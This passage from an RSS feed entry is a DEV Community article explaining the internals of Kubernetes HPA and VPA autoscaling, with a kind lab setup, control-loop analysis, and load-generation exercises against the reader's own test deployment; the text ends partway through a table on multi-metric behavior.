<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Piyush Jajoo</title>
    <description>The latest articles on DEV Community by Piyush Jajoo (@piyushjajoo).</description>
    <link>https://dev.to/piyushjajoo</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F1120882%2Fdb4963b5-a4f3-476e-8d3a-18fee8b04327.png</url>
      <title>DEV Community: Piyush Jajoo</title>
      <link>https://dev.to/piyushjajoo</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/piyushjajoo"/>
    <language>en</language>
    <item>
      <title>Kubernetes Autoscaling Internals: HPA and VPA Under the Hood</title>
      <dc:creator>Piyush Jajoo</dc:creator>
      <pubDate>Fri, 03 Apr 2026 01:30:10 +0000</pubDate>
      <link>https://dev.to/piyushjajoo/kubernetes-autoscaling-internals-hpa-and-vpa-under-the-hood-4e0g</link>
      <guid>https://dev.to/piyushjajoo/kubernetes-autoscaling-internals-hpa-and-vpa-under-the-hood-4e0g</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;This post assumes Kubernetes 1.27+ and the &lt;code&gt;autoscaling/v2&lt;/code&gt; API. It targets senior ICs and platform engineers who operate autoscaling systems in production.&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  Table of Contents
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Prerequisites: Setting Up Your Lab Cluster&lt;/li&gt;
&lt;li&gt;Autoscaling Is a Multi-Loop System&lt;/li&gt;
&lt;li&gt;The Problem Space&lt;/li&gt;
&lt;li&gt;
Horizontal Pod Autoscaler (HPA)

&lt;ul&gt;
&lt;li&gt;The Control Loop&lt;/li&gt;
&lt;li&gt;HPA as a Delayed, Saturating P-Controller&lt;/li&gt;
&lt;li&gt;The End-to-End Reaction Time&lt;/li&gt;
&lt;li&gt;The Scaling Algorithm&lt;/li&gt;
&lt;li&gt;Multi-Metric Behavior&lt;/li&gt;
&lt;li&gt;CPU vs. External Metrics: An Explicit Tradeoff&lt;/li&gt;
&lt;li&gt;HPA v2 Scaling Policies&lt;/li&gt;
&lt;li&gt;The CPU Request Coupling Problem&lt;/li&gt;
&lt;li&gt;Metrics Pipeline&lt;/li&gt;
&lt;li&gt;Scale-to-Zero&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

Vertical Pod Autoscaler (VPA)

&lt;ul&gt;
&lt;li&gt;Architecture: Three Separate Components&lt;/li&gt;
&lt;li&gt;The Recommender: Statistical Core&lt;/li&gt;
&lt;li&gt;The Updater: The Disruptive Actor&lt;/li&gt;
&lt;li&gt;The Admission Controller: The Mutation Point&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;HPA vs VPA: When to Use Which&lt;/li&gt;

&lt;li&gt;Cluster Autoscaler Interaction&lt;/li&gt;

&lt;li&gt;Operational Gotchas&lt;/li&gt;

&lt;li&gt;Autoscaling Failure Taxonomy&lt;/li&gt;

&lt;li&gt;Production Incident Pattern: The Black Friday Failure Mode&lt;/li&gt;

&lt;li&gt;Choosing an Autoscaling Strategy&lt;/li&gt;

&lt;li&gt;Production Design Pattern: A Battle-Tested Reference Architecture&lt;/li&gt;

&lt;li&gt;Cost Dynamics of Autoscaling&lt;/li&gt;

&lt;li&gt;What Experienced Engineers Actually Do&lt;/li&gt;

&lt;li&gt;

Common Misconfigurations

&lt;ul&gt;
&lt;li&gt;HPA Anti-Patterns&lt;/li&gt;
&lt;li&gt;VPA Anti-Patterns&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;Observability: Metrics That Matter&lt;/li&gt;

&lt;li&gt;Summary&lt;/li&gt;

&lt;/ul&gt;





&lt;h2&gt;
  
  
  Prerequisites: Setting Up Your Lab Cluster
&lt;/h2&gt;

&lt;p&gt;Before diving in, spin up a local &lt;code&gt;kind&lt;/code&gt; cluster and install metrics-server. All exercises in this guide assume this setup.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Install kind if you haven't already&lt;/span&gt;
brew &lt;span class="nb"&gt;install &lt;/span&gt;kind          &lt;span class="c"&gt;# macOS&lt;/span&gt;
&lt;span class="c"&gt;# or: curl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.22.0/kind-linux-amd64 &amp;amp;&amp;amp; chmod +x kind &amp;amp;&amp;amp; mv kind /usr/local/bin/&lt;/span&gt;

&lt;span class="c"&gt;# Create a 3-node cluster (1 control-plane + 2 workers)&lt;/span&gt;
&lt;span class="nb"&gt;cat&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&lt;span class="no"&gt;EOF&lt;/span&gt;&lt;span class="sh"&gt; | kind create cluster --name autoscaling-lab --config=-
kind: Cluster
apiVersion: kind.x-k8s.io/v1alpha4
nodes:
- role: control-plane
- role: worker
- role: worker
&lt;/span&gt;&lt;span class="no"&gt;EOF

&lt;/span&gt;&lt;span class="c"&gt;# Install metrics-server (kind doesn't ship it)&lt;/span&gt;
kubectl apply &lt;span class="nt"&gt;-f&lt;/span&gt; https://github.com/kubernetes-sigs/metrics-server/releases/latest/download/components.yaml

&lt;span class="c"&gt;# Patch metrics-server to work without TLS verification (required in kind)&lt;/span&gt;
kubectl patch deployment metrics-server &lt;span class="nt"&gt;-n&lt;/span&gt; kube-system &lt;span class="nt"&gt;--type&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'json'&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-p&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'[{"op":"add","path":"/spec/template/spec/containers/0/args/-","value":"--kubelet-insecure-tls"}]'&lt;/span&gt;

&lt;span class="c"&gt;# Wait for metrics-server to be ready&lt;/span&gt;
kubectl rollout status deployment/metrics-server &lt;span class="nt"&gt;-n&lt;/span&gt; kube-system &lt;span class="nt"&gt;--timeout&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;60s

&lt;span class="c"&gt;# Verify it's working (may take ~30s after rollout)&lt;/span&gt;
kubectl top nodes
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;







&lt;h2&gt;
  
  
  Autoscaling Is a Multi-Loop System
&lt;/h2&gt;

&lt;p&gt;Before diving into HPA and VPA internals, it is worth establishing the full system. Kubernetes autoscaling is not one controller — it is four independent control loops operating on different timescales and different variables:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Loop&lt;/th&gt;
&lt;th&gt;What it controls&lt;/th&gt;
&lt;th&gt;Timescale&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;HPA&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Replica count&lt;/td&gt;
&lt;td&gt;Seconds to minutes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;VPA&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Per-pod resource requests&lt;/td&gt;
&lt;td&gt;Minutes to hours&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Cluster Autoscaler&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Node count&lt;/td&gt;
&lt;td&gt;Minutes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Scheduler&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Pod placement&lt;/td&gt;
&lt;td&gt;Milliseconds&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Most production autoscaling incidents do not occur because a single loop misbehaved. They occur because &lt;strong&gt;two loops reacted to the same signal on different timescales&lt;/strong&gt; — HPA scaling out while VPA evicts, CA provisioning for a transient condition, the scheduler unable to place pods while CA is still bootstrapping. Understanding each loop in isolation is necessary but not sufficient. This post focuses on HPA and VPA, but always with awareness of how they interact with the broader system.&lt;/p&gt;





&lt;h2&gt;
  
  
  The Problem Space
&lt;/h2&gt;

&lt;p&gt;Autoscaling is not "automatic scaling" — it is &lt;strong&gt;approximate control under delayed, noisy signals&lt;/strong&gt;. It is two independent control systems manipulating different variables with incomplete information and non-zero lag. HPA and VPA operate on fundamentally different axes, use different control models, and interact with each other in ways that will cause production incidents if misunderstood. The goal of this post is to build the internal mental model needed to tune and debug them without flying blind.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;🧠 &lt;strong&gt;Mental Model: Autoscaling is Approximation&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Autoscalers operate on metrics that are sampled, aggregated, and delayed. They apply changes that take tens of seconds to minutes to materialize. Perfect elastic scaling is not achievable — only &lt;strong&gt;bounded approximation&lt;/strong&gt; is. The engineering goal is not to eliminate the gap between supply and demand, but to constrain how large that gap can grow and how long it can persist.&lt;/p&gt;
&lt;/blockquote&gt;





&lt;h2&gt;
  
  
  Horizontal Pod Autoscaler (HPA)
&lt;/h2&gt;


&lt;h3&gt;
  
  
  The Control Loop
&lt;/h3&gt;

&lt;p&gt;HPA is a classic &lt;strong&gt;reconciliation controller&lt;/strong&gt; running in &lt;code&gt;kube-controller-manager&lt;/code&gt;. Every 15 seconds (configurable via &lt;code&gt;--horizontal-pod-autoscaler-sync-period&lt;/code&gt;), it wakes up, samples metrics, computes a desired replica count, and patches the target's &lt;code&gt;spec.replicas&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Feq41juhga5ivb77uox8s.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Feq41juhga5ivb77uox8s.png" alt="image" width="800" height="278"&gt;&lt;/a&gt;&lt;/p&gt;


&lt;h3&gt;
  
  
  HPA as a Delayed, Saturating P-Controller
&lt;/h3&gt;

&lt;p&gt;HPA is not just a proportional controller — it is a &lt;strong&gt;delayed, rate-limited, saturating P-controller operating on a lagging signal&lt;/strong&gt;. It reacts to the instantaneous ratio between observed and desired metric values with no integral or derivative terms. This framing matters because it predicts failure modes precisely:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;No integral term&lt;/strong&gt;: Steady-state error persists. If your metric target is set too high, HPA will converge to a replica count that satisfies the ratio on paper but still leaves the service under-provisioned relative to actual demand.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No derivative term&lt;/strong&gt;: HPA cannot anticipate spikes. It has no model of metric velocity or acceleration — only current deviation from target.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;High phase lag&lt;/strong&gt;: The 75–135 second reaction chain means HPA is always responding to load conditions that no longer exist at the moment the new pods are ready.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Hard saturation&lt;/strong&gt;: &lt;code&gt;minReplicas&lt;/code&gt;/&lt;code&gt;maxReplicas&lt;/code&gt; and scaling policies create non-linear saturation effects. At saturation boundaries, the proportional response is simply clipped.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This combination makes HPA inherently prone to &lt;strong&gt;limit cycles under bursty load&lt;/strong&gt;: it oscillates between under-provisioned and recovering states because it cannot hold position at steady state under noisy input. Stabilization windows exist as bolt-on hysteresis mechanisms rather than intrinsic damping — they reduce oscillation frequency but do not eliminate the underlying phase lag.&lt;/p&gt;
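&lt;p&gt;The limit-cycle claim can be made concrete with a toy simulation (illustrative parameters, not the real controller): a pure P-controller scaling on a utilization sample that is several ticks stale, with no tolerance band and no stabilization window. Instead of settling at the equilibrium replica count, it cycles:&lt;/p&gt;

```python
import math
from fractions import Fraction

# Toy simulation (illustrative parameters, not the real controller):
# a pure P-controller acting on a utilization sample that is several
# ticks stale, with no tolerance band and no stabilization window.
CAPACITY = 100            # req/s one replica serves at 100% utilization
TARGET = Fraction(1, 2)   # 50% utilization target
MAX_REPLICAS = 50
DEMAND = 600              # steady req/s; equilibrium is 12 replicas

def utilization(replicas):
    return Fraction(DEMAND, CAPACITY * replicas)

replicas = 3
history = [utilization(replicas)] * 3   # stale samples already in flight
counts = []
for _ in range(10):
    observed = history.pop(0)           # several-tick-old measurement
    replicas = min(MAX_REPLICAS, max(1, math.ceil(replicas * observed / TARGET)))
    history.append(utilization(replicas))
    counts.append(replicas)

print(counts)   # [12, 48, 50, 50, 13, 4, 1, 1, 3, 36]
```

&lt;p&gt;At 600 req/s of demand and 100 req/s of per-replica capacity, the equilibrium at a 50% target is 12 replicas, yet the simulated count overshoots to the cap, collapses to 1, and climbs again. Tolerance bands and stabilization windows exist precisely to damp this behavior.&lt;/p&gt;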

&lt;blockquote&gt;
&lt;p&gt;🧠 &lt;strong&gt;Mental Model: HPA Buys Time, Not Capacity&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;HPA does not handle spikes — it reacts after the spike has already started. Your system must survive the first 75–135 seconds &lt;em&gt;without any additional pods&lt;/em&gt;. Conservative CPU targets (50–65%), generous &lt;code&gt;minReplicas&lt;/code&gt;, and pre-warmed capacity buffers are not timidity — they are the engineering response to a controller with 90+ second phase lag.&lt;/p&gt;
&lt;/blockquote&gt;


&lt;h3&gt;
  
  
  The End-to-End Reaction Time
&lt;/h3&gt;

&lt;p&gt;A critical mental model that most teams lack is a quantified timing chain. When traffic spikes, the time before new pods are actually serving requests is approximately:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Total Reaction Time ≈
  metric scrape interval    (~15s  for metrics-server)
+ metrics aggregation lag   (~15s)
+ HPA sync period           (~15s)
+ pod startup time          (20–60s depending on image and init)
+ readiness probe delay     (10–30s)
─────────────────────────────────────
Realistic range:             75 – 135 seconds
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This means that under a sharp traffic spike, your service absorbs load for &lt;strong&gt;over a minute&lt;/strong&gt; before a single additional pod is ready. Setting CPU targets at 80–90% leaves no headroom for that window. Conservative targets (50–65%) exist precisely to buy time for this pipeline to execute.&lt;/p&gt;
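&lt;p&gt;The headroom argument is simple arithmetic. Under the assumption that CPU utilization scales roughly linearly with request rate, a service running at its CPU target of T% can absorb about 100/T times its current traffic before pods saturate during the reaction window:&lt;/p&gt;

```python
# Back-of-envelope headroom arithmetic. Assumption (labeled as such):
# CPU utilization scales roughly linearly with request rate.
def absorbable_multiplier(cpu_target_pct):
    """Traffic multiple at which pods hit 100% CPU when currently
    running at exactly the target utilization."""
    return 100 / cpu_target_pct

for target in (50, 65, 80, 90):
    mult = absorbable_multiplier(target)
    print(f"{target}% target: ~{mult:.2f}x traffic headroom during the reaction window")
```

&lt;p&gt;A 50% target tolerates a doubling of traffic while the pipeline executes; a 90% target tolerates barely a 10% increase.&lt;/p&gt;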




&lt;blockquote&gt;
&lt;h3&gt;
  
  
  🧪 Exercise 1: Observe the HPA Reaction Time Pipeline
&lt;/h3&gt;

&lt;p&gt;Deploy a simple CPU-bound workload and watch the timing chain in action.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 1: Deploy the target workload&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;kubectl create deployment php-apache &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--image&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;registry.k8s.io/hpa-example &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--port&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;80

kubectl &lt;span class="nb"&gt;set &lt;/span&gt;resources deployment php-apache &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--requests&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nv"&gt;cpu&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;200m,memory&lt;span class="o"&gt;=&lt;/span&gt;64Mi &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--limits&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nv"&gt;cpu&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;500m,memory&lt;span class="o"&gt;=&lt;/span&gt;128Mi

kubectl expose deployment php-apache &lt;span class="nt"&gt;--port&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;80 &lt;span class="nt"&gt;--name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;php-apache
&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;Step 2: Create an HPA targeting 50% CPU&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;kubectl autoscale deployment php-apache &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--cpu-percent&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;50 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--min&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;1 &lt;span class="nt"&gt;--max&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;10

&lt;span class="c"&gt;# Watch the HPA state in one terminal&lt;/span&gt;
kubectl get hpa php-apache &lt;span class="nt"&gt;--watch&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;Step 3: Generate load and timestamp the spike&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# In a second terminal: record the exact time and start load&lt;/span&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"Load started at: &lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;date&lt;/span&gt; +%T&lt;span class="si"&gt;)&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;
kubectl run &lt;span class="nt"&gt;-i&lt;/span&gt; &lt;span class="nt"&gt;--tty&lt;/span&gt; load-generator &lt;span class="nt"&gt;--rm&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--image&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;busybox:1.28 &lt;span class="nt"&gt;--restart&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;Never &lt;span class="nt"&gt;--&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  /bin/sh &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="s2"&gt;"while sleep 0.01; do wget -q -O- http://php-apache; done"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;Step 4: Measure the delay&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# In a third terminal, poll and timestamp HPA events&lt;/span&gt;
kubectl get events &lt;span class="nt"&gt;--field-selector&lt;/span&gt; involvedObject.name&lt;span class="o"&gt;=&lt;/span&gt;php-apache &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--sort-by&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'.lastTimestamp'&lt;/span&gt; &lt;span class="nt"&gt;--watch&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;What to observe:&lt;/strong&gt; Note the timestamp when you started the load vs. when the first &lt;code&gt;SuccessfulRescale&lt;/code&gt; event appears. You should see roughly 45–90 seconds of lag. Compare the gap against the timing chain formula above.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Expected signal shape if you were graphing this:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;CPU utilization: sharp spike within 15s of load start&lt;/li&gt;
&lt;li&gt;Replica count: flat for 45–90s, then a step increase&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Phase lag&lt;/strong&gt; between CPU spike and replica step is the controller's entire reaction pipeline made visible&lt;/li&gt;
&lt;li&gt;After scaling, CPU drops as load spreads across new pods — but there is typically a secondary spike as readiness probes pass and traffic routing catches up&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Stop the load:&lt;/strong&gt; &lt;code&gt;Ctrl+C&lt;/code&gt; in the load-generator terminal. The pod will self-delete (it was &lt;code&gt;--rm&lt;/code&gt;).&lt;/p&gt;
&lt;/blockquote&gt;





&lt;h3&gt;
  
  
  The Scaling Algorithm
&lt;/h3&gt;

&lt;p&gt;The core formula:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;desiredReplicas = ceil[currentReplicas × (currentMetricValue / desiredMetricValue)]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Several stabilizing mechanisms layer on top:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Stabilization windows&lt;/strong&gt; prevent oscillation. Because HPA lacks intrinsic damping, stabilization windows act as an external hysteresis mechanism. The controller maintains a rolling window of past recommendations. For scale-down, it selects the &lt;strong&gt;maximum&lt;/strong&gt; recommendation seen during the window (default: 300s), preventing premature scale-in. For scale-up, it selects the &lt;strong&gt;minimum&lt;/strong&gt; recommendation (default: 0s — acts immediately). This asymmetry is intentional: be aggressive about adding capacity, conservative about removing it. CA mirrors this philosophy at the node level — its scale-down is even more conservative, with a default 10-minute idle delay before a node is considered for removal. Both loops are deliberately slow to release capacity.&lt;/p&gt;
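&lt;p&gt;The window selection logic is easy to sketch. One simplification: the real controller timestamps recommendations, while here a fixed-length list stands in for "recommendations seen during the window":&lt;/p&gt;

```python
# Sketch of the rolling-window selection described above. Simplification:
# the real controller timestamps recommendations; a fixed-length list
# stands in for "recommendations seen during the window".
def stabilize(recommendations, direction):
    # scale-down keeps the MAX recent recommendation (hold capacity);
    # scale-up keeps the MIN (do not act on a single spike)
    return max(recommendations) if direction == "down" else min(recommendations)

recent = [8, 5, 7, 4, 6]          # noisy per-sync recommendations
print(stabilize(recent, "down"))  # 8: replicas held despite the dip to 4
print(stabilize(recent, "up"))    # 4: a lone spike to 8 is ignored
```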

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fn3i9ej92071aak0d50fo.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fn3i9ej92071aak0d50fo.png" alt="image" width="800" height="1815"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Tolerance&lt;/strong&gt; (default &lt;code&gt;0.1&lt;/code&gt; = 10%) means HPA won't act if &lt;code&gt;currentValue&lt;/code&gt; is within 10% of &lt;code&gt;targetValue&lt;/code&gt;, preventing constant micro-adjustments under noisy metrics.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Missing pod handling&lt;/strong&gt;: For pods that have no metrics (not yet &lt;code&gt;Running&lt;/code&gt;, or mid-startup), HPA applies a conservative heuristic. When a scale-up is being considered, those pods are assumed to be using 0% of the desired metric value, which dampens the magnitude of the scale-up. When a scale-down is being considered, they are assumed to be at 100% of the desired value, which dampens the scale-down. Either way, the assumption biases toward leaving the current replica count alone.&lt;/p&gt;
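&lt;p&gt;Putting the core formula, the tolerance band, and min/max clamping together in a simplified sketch (missing-pod handling and readiness gating deliberately omitted):&lt;/p&gt;

```python
import math

TOLERANCE = 0.1   # default for --horizontal-pod-autoscaler-tolerance

def desired_replicas(current, metric, target, min_r=1, max_r=10):
    """Simplified sketch: core ratio formula plus the tolerance band and
    min/max clamping. Missing-pod handling and readiness are omitted."""
    ratio = metric / target
    # no action while the deviation from target stays inside the band
    # (the max() comparison is true exactly when abs(ratio - 1.0) is
    # at most TOLERANCE)
    if max(abs(ratio - 1.0), TOLERANCE) == TOLERANCE:
        return current
    return max(min_r, min(max_r, math.ceil(current * ratio)))

print(desired_replicas(4, 75, 50))   # ratio 1.5, ceil(6.0) = 6
print(desired_replicas(4, 52, 50))   # within the 10% band: stays 4
```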




&lt;blockquote&gt;
&lt;h3&gt;
  
  
  🧪 Exercise 2: Verify the Stabilization Window During Scale-Down
&lt;/h3&gt;

&lt;p&gt;This exercise makes the 300-second scale-down stabilization window visible. You'll drive scale-up, stop the load, and watch HPA refuse to scale down immediately.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Setup (continuing from Exercise 1, or re-run setup):&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Ensure php-apache HPA exists with default behavior&lt;/span&gt;
kubectl get hpa php-apache
&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;Generate load until HPA scales out to 3+ replicas:&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;kubectl run &lt;span class="nt"&gt;-i&lt;/span&gt; &lt;span class="nt"&gt;--tty&lt;/span&gt; load-generator &lt;span class="nt"&gt;--rm&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--image&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;busybox:1.28 &lt;span class="nt"&gt;--restart&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;Never &lt;span class="nt"&gt;--&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  /bin/sh &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="s2"&gt;"while sleep 0.01; do wget -q -O- http://php-apache; done"&lt;/span&gt;

&lt;span class="c"&gt;# Wait until replicas &amp;gt;= 3&lt;/span&gt;
kubectl get hpa php-apache &lt;span class="nt"&gt;--watch&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;Stop load and record the time:&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Ctrl+C in load-generator terminal, then:&lt;/span&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"Load stopped at: &lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;date&lt;/span&gt; +%T&lt;span class="si"&gt;)&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;
kubectl get hpa php-apache &lt;span class="nt"&gt;--watch&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;What to observe:&lt;/strong&gt; After load stops, CPU will drop immediately, but HPA will hold replica count for ~5 minutes before scaling down. This is the 300-second &lt;code&gt;scaleDown&lt;/code&gt; stabilization window in action.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Shortcut the wait — override the stabilization window:&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;kubectl patch hpa php-apache &lt;span class="nt"&gt;--type&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'merge'&lt;/span&gt; &lt;span class="nt"&gt;-p&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'
spec:
  behavior:
    scaleDown:
      stabilizationWindowSeconds: 30
      policies:
      - type: Percent
        value: 100
        periodSeconds: 30'&lt;/span&gt;

&lt;span class="c"&gt;# Now watch scale-down happen much faster&lt;/span&gt;
kubectl get hpa php-apache &lt;span class="nt"&gt;--watch&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;Key insight:&lt;/strong&gt; The default 300s window exists to prevent flapping. Override it with care — a too-aggressive scale-down policy can cause oscillation under bursty traffic.&lt;/p&gt;
&lt;/blockquote&gt;





&lt;h3&gt;
  
  
  Multi-Metric Behavior
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/pkg/controller/podautoscaler/horizontal.go#L313" rel="noopener noreferrer"&gt;computeReplicasForMetrics&lt;/a&gt; in &lt;code&gt;pkg/controller/podautoscaler/&lt;/code&gt; iterates over all configured metrics and takes the &lt;strong&gt;maximum&lt;/strong&gt; desired replica count — metrics are not averaged. Consider a service configured with both CPU and RPS targets:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Metric&lt;/th&gt;
&lt;th&gt;Current&lt;/th&gt;
